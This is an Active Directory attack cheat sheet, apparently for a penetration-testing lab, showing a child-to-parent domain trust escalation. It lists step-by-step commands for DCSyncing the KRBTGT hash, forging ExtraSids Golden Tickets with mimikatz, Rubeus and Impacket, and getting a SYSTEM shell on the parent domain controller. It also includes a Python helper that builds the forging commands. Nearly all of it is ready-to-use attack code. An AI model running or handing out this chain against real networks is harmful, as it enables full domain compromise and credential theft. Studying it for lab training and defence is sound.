Trust Relationships - Child > Parent Trusts

1. Import Active Directory Module

Command:

Import-Module activedirectory

Description: Imports the Active Directory PowerShell module (part of RSAT), which provides Get-ADTrust and the other Get-AD* cmdlets used below.

2. Enumerate Domain Trusts (PowerShell)

Command:

Get-ADTrust -Filter *

Description: Enumerates every trust of the current domain with the built-in AD module, including its Direction, whether it is IntraForest, and the SIDFilteringQuarantined flag. A parent/child trust inside one forest does not enforce SID filtering, which is the precondition for the ExtraSids attack below.

3. Enumerate Domain Trusts (PowerView)

Command:

Get-DomainTrust

Description: Same enumeration with PowerView. For a child/parent trust the TrustAttributes field shows WITHIN_FOREST, and the trust is bidirectional.

4. Perform Domain Trust Mapping

Command:

Get-DomainTrustMapping

Description: Recursively enumerates the trusts of every domain reachable from the current one (PowerView), so parent, sibling and external trusts appear in a single map.

5. Enumerate Users in a Child Domain

Command:

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Description: Lists the SamAccountNames of users in the compromised child domain (LOGISTICS.INLANEFREIGHT.LOCAL). The -Domain switch is what lets PowerView query a specific domain instead of the current one.

6. Extract KRBTGT Hash via DCSync

Command:

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

Description: Retrieves the NT hash of the child domain's KRBTGT account via DCSync. This requires Domain Admin (or equivalent replication rights) in the child domain; the hash is what signs the Golden Ticket in steps 10, 11 and 17.

7. Get Domain SID

Command:

Get-DomainSID

Description: Retrieves the SID of the current (child) domain. This is the /sid value of the Golden Ticket, not the parent's SID.

8. Retrieve Enterprise Admins Group SID

Command:

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

Description: Retrieves the SID of the parent domain's Enterprise Admins group. It is always the parent domain SID followed by the well-known RID 519, and it becomes the /sids (ExtraSids) value of the Golden Ticket.

9. List C Drive Contents of a Domain Controller

Command:

ls \\academy-ea-dc01.inlanefreight.local\c$

Description: Attempts to list the C$ share of the parent domain controller. Run before the Golden Ticket is injected this is denied, which makes it a simple before/after check for the escalation.

10. Create a Golden Ticket (Mimikatz)

Command:

mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

Description: Forges a Golden Ticket for the child domain as a non-existent user (hacker), signed with the child KRBTGT hash, with the parent's Enterprise Admins SID injected into the ticket's ExtraSids (SID History) via /sids. Because SID filtering is not enforced on intra-forest parent/child trusts, the parent DC honours that SID and treats the ticket holder as an Enterprise Admin. /ptt injects the ticket into the current session.

11. Create a Golden Ticket (Rubeus)

Command:

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Description: Same forgery with Rubeus: /rc4 takes the child KRBTGT NT hash, /sid the child domain SID, /sids the parent Enterprise Admins SID, and /ptt injects the ticket into the current logon session.

12. Perform DCSync Attack (Mimikatz)

Command:

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm

Description: Confirms the escalation by DCSyncing an account of the parent domain (INLANEFREIGHT\lab_adm) with the injected ticket. Success means the parent DC accepted the Enterprise Admins SID from the ticket's ExtraSids.

13. Perform DCSync Attack (Impacket)

Command:

secretsdump.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Description: Linux equivalent of step 6: authenticates to the child DC (172.16.5.240) as a child-domain admin and DCSyncs only the KRBTGT account (-just-dc-user) with Impacket's secretsdump.py.

14. Perform SID Brute-Forcing

Command:

lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240

Description: Brute-forces RIDs over LSARPC with Impacket's lookupsid.py to enumerate the users and groups of the child domain; the output also prints the child domain SID.

15. Retrieve Domain SID

Command:

lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240 | grep "Domain SID"

Description: Filters the lookupsid.py output down to the "Domain SID is:" line, i.e. the child domain SID needed for -domain-sid in step 17.

16. Retrieve Enterprise Admins SID

Command:

lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Description: Runs lookupsid.py against the parent DC (172.16.5.5) and prints the Enterprise Admins line together with the 12 lines before it, which include the parent domain SID. The group SID is that domain SID followed by -519.

17. Create a Golden Ticket (Impacket)

Command:

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Description: Forges the same Golden Ticket with Impacket's ticketer.py: -nthash is the child KRBTGT hash, -domain-sid the child domain SID and -extra-sid the parent Enterprise Admins SID. The ticket is saved as hacker.ccache.
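The mimikatz/Rubeus path (steps 7 to 11) and the Impacket path (steps 14 to 17) both hinge on the same two values: the child domain SID for /sid (-domain-sid) and the parent domain SID with RID 519 appended for /sids (-extra-sid). Swapping the two domains is the usual mistake. The following helper is an added example, not part of the original page, Impacket or mimikatz: it parses lookupsid.py-style output captured from the child DC and the parent DC, derives and cross-checks both SIDs, rejects a /sids value built from the wrong domain or RID, and prints the ticketer.py and mimikatz command lines. The two outputs embedded below are constructed samples in lookupsid.py's format using this page's lab SIDs, and the "hacker" user and KRBTGT hash are the ones from the page's commands.

```python
"""
Added example (not from the original page, Impacket or mimikatz): derive and
cross-check the SIDs an ExtraSids Golden Ticket needs for a child -> parent
escalation, starting from lookupsid.py-style output for the child DC and the
parent DC, then emit the matching ticketer.py and mimikatz command lines.
"""
import re

ENTERPRISE_ADMINS_RID = 519  # well-known RID of the forest root's Enterprise Admins group

DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")
# "519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)"
RID_LINE_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$", re.M)

# --- constructed samples in lookupsid.py's output format (not real captures) ---
CHILD_LOOKUPSID = """\
[*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
500: LOGISTICS\\Administrator (SidTypeUser)
502: LOGISTICS\\krbtgt (SidTypeUser)
512: LOGISTICS\\Domain Admins (SidTypeGroup)
"""

PARENT_LOOKUPSID = """\
[*] Brute forcing SIDs at 172.16.5.5
[*] StringBinding ncacn_np:172.16.5.5[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
500: INLANEFREIGHT\\Administrator (SidTypeUser)
512: INLANEFREIGHT\\Domain Admins (SidTypeGroup)
519: INLANEFREIGHT\\Enterprise Admins (SidTypeGroup)
"""


def parse_lookupsid(output):
    """Return (domain_sid, {rid: (netbios_domain, name, sid_type)}) from lookupsid.py output."""
    match = DOMAIN_SID_RE.search(output)
    if not match:
        raise ValueError("no 'Domain SID is:' line in lookupsid output")
    rids = {int(rid): (dom, name, kind)
            for rid, dom, name, kind in RID_LINE_RE.findall(output)}
    return match.group(1), rids


def split_sid(sid):
    """Split 'S-1-5-21-a-b-c-RID' into ('S-1-5-21-a-b-c', RID)."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


def check_extra_sid(extra_sid, child_sid, parent_sid):
    """Return the problems with a proposed /sids value (empty list means it is usable).

    Catches the two classic mistakes: building the extra SID from the child's
    domain SID instead of the parent's, and using a RID other than 519.
    """
    problems = []
    base, rid = split_sid(extra_sid)
    if base == child_sid:
        problems.append("extra SID is built from the CHILD domain SID; it must use the parent's")
    elif base != parent_sid:
        problems.append("extra SID does not belong to the parent domain")
    if rid != ENTERPRISE_ADMINS_RID:
        problems.append(f"RID {rid} is not Enterprise Admins (519)")
    return problems


def build_attack_sids(child_output, parent_output):
    """Derive the child domain SID, parent domain SID and parent Enterprise Admins SID."""
    child_sid, _ = parse_lookupsid(child_output)
    parent_sid, parent_rids = parse_lookupsid(parent_output)
    if child_sid == parent_sid:
        raise ValueError("both outputs describe the same domain; one must come from the parent DC")
    ea_sid = f"{parent_sid}-{ENTERPRISE_ADMINS_RID}"
    # Cross-check the derived SID against what the parent DC resolved for RID 519.
    entry = parent_rids.get(ENTERPRISE_ADMINS_RID)
    if entry is None or entry[1] != "Enterprise Admins":
        raise ValueError("RID 519 in the parent output is not Enterprise Admins; wrong DC?")
    return {"child_sid": child_sid, "parent_sid": parent_sid, "ea_sid": ea_sid}


def ticketer_cmd(sids, krbtgt_nthash, child_domain, user="hacker"):
    """ticketer.py line: TGT for the child domain with the parent EA SID as extra SID."""
    return (f"ticketer.py -nthash {krbtgt_nthash} -domain {child_domain} "
            f"-domain-sid {sids['child_sid']} -extra-sid {sids['ea_sid']} {user}")


def mimikatz_cmd(sids, krbtgt_nthash, child_domain, user="hacker"):
    """Equivalent mimikatz kerberos::golden line, injected with /ptt."""
    return (f"kerberos::golden /user:{user} /domain:{child_domain} /sid:{sids['child_sid']} "
            f"/krbtgt:{krbtgt_nthash} /sids:{sids['ea_sid']} /ptt")


if __name__ == "__main__":
    sids = build_attack_sids(CHILD_LOOKUPSID, PARENT_LOOKUPSID)
    for problem in check_extra_sid(sids["ea_sid"], sids["child_sid"], sids["parent_sid"]):
        print("WARNING:", problem)
    # KRBTGT hash and domain taken from this page's commands.
    print(ticketer_cmd(sids, "9d765b482771505cbe97411065964d5f", "LOGISTICS.INLANEFREIGHT.LOCAL"))
    print(mimikatz_cmd(sids, "9d765b482771505cbe97411065964d5f", "LOGISTICS.INLANEFREIGHT.LOCAL"))
```

Feed it the real lookupsid.py output from steps 14 and 16 instead of the embedded samples; the cross-check against the resolved name for RID 519 will fail loudly if the second capture was taken from the child DC by mistake.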

18. Set Kerberos Ticket Cache

Command:

export KRB5CCNAME=hacker.ccache

Description: Points the Impacket tools at the forged ticket cache written by ticketer.py, so that -k picks it up in the next step.

19. Establish a Shell on Domain Controller

Command:

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Description: Uses the forged ticket (-k -no-pass) to obtain a SYSTEM shell on the parent domain controller with psexec.py. The target must be given by hostname so the Kerberos service ticket matches the DC's SPN; -target-ip supplies the address when that name does not resolve.

20. Escalate from Child to Parent Domain

Command:

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Description: Automates the whole chain with Impacket's raiseChild.py using child-domain admin credentials: it DCSyncs the child KRBTGT, forges the Golden Ticket with the parent Enterprise Admins SID as extra SID, dumps the parent Administrator's hash, and with -target-exec spawns a PSExec shell on the given host (here the parent DC).
